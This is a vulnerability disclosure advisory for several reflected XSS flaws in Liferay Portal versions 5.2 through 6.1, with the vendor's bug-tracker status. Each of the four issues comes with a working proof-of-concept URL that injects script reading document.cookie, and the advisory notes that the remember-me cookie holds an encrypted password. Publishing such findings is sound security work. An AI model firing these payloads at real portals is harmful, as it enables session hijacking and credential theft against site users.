Multiple xss issues in Liferay


Multiple xss issues in Liferay Description: Liferay Portal is an enterprise portal written in Java Multiple xss vulnerabilities where found in liferay. Because liferay has a "remember me" option in their login screen that stores an encrypted password in a cookie this is more problematic than it otherwise would be 1. xss vulnerability in upload_progress_poller.jsp http://vulnerablehost/html/portal/upload_progress_poller.jsp?uploadProgressId=a%3D1%3Balert%28document.cookie%29%3B%2F%2F 2. xss vulnerability in ckeditor.jsp http://vulnerablehost?p_p_id=15&p_p_lifecycle=2&_15_struts_action=/journal/edit_article&ckEditorConfigFileName=ckconfig.jsp%27%2Ca%3Aalert%28document.cookie%29%2Cb%3A%27 3. xss vulnerability in the currency converter portlet To reproduce : Drag the currency converter on the home page then go to : http://localhost:8080/web/guest/home?_16_chartId=%22/%3E%3Cscript%20type=%22text/javascript%22%3Ealert(123);%3C/script%3E&p_p_id=16&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&p_p_col_id=column-1&_16_struts_action=%2Fcurrency_converter%2Fview 4. xss vulnerability in the blog portlet To reproduce : 1. Drag the blog on the home page, 2. create a blog and add this blog to a category. 3. Go to the list of blog posts, click on the link to category that you assigned to the blog to, 4. append &tag=<script type="text/javascript">alert(document.cookie)</script> to the url that was created when you clicked on the link in step 3 Systems affected (by at least one of the vulnerabilities): Liferay 6.1 ce Liferay 6.1 ee Liferay 6.0.x Liferay 5.2.x Vendor status : Liferay was notified april 12 2012 by filing a bugs in their public bugtracker under issue numbers LPS-27280, LPS-27281, LPS-27282, LPS-27283 The issues have not yet been resolved